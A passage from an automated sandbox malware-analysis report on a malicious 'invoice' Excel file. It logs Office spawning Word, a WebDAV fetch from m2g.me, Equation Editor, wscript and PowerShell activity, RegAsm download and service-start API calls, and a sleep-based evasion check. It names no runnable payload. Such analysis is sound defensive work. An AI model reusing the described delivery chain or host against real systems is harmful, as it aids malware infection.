                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414060 push eax; ret 22_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414039 push ecx; ret 22_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004164EB push 0000006Ah; retf 22_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00416553 push 0000006Ah; retf 22_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00416555 push 0000006Ah; retf 22_2_004165C4

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRootJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRootJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____verynic[1].doc.0.drJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: B5BBC488.doc.4.drJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00406EEB ShellExecuteW,URLDownloadToFileW,19_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,19_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: invoice_45009.xlsStream path 'MBD009D0188/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: invoice_45009.xlsStream path 'Workbook' entropy: 7.99877132573 (max. 8.0)
                    Source: 33930000.0.drStream path 'MBD009D0188/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: 33930000.0.drStream path 'Workbook' entropy: 7.99883715721 (max. 8.0)
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040F7E2 Sleep,ExitProcess,19_2_0040F7E2
